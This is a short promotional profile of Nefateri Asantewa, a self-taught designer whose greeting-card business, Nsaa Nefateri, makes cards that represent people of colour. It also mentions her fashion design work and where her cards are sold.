What started out as a £20 card making hobby in a conservatory 7 years ago has been transformed into a business that reflects the beauty of cultural diversity.  Nsaa Nefateri, the business created by Nefateri Asantewa, mother of 5, is a business that inspires, uplifts and empowers people.  She has gone from the sale of one card to sales of over 4000 cards in 2015 and continues to spread joy.  Nefateri is a self-taught artist and designer and has created over 500 designs in the last 7 years.

Her passion to design cards that represent people of colour is to boost self-esteem and promote positive images of hue.  With a lack of positive representation in the card and gift market place, she joins others in the push to bring balance one beautiful image at a time.  She has an online store and her cards can currently be found in stockists in and around London, as well as in Birmingham.

Nefateri is also a self-taught fashion designer and seamstress and has created several one off pieces for individuals and is currently working on designing her first collection.  All this whilst juggling motherhood, working as a trainer and building a ‘Cultural Elegance’ Brand.
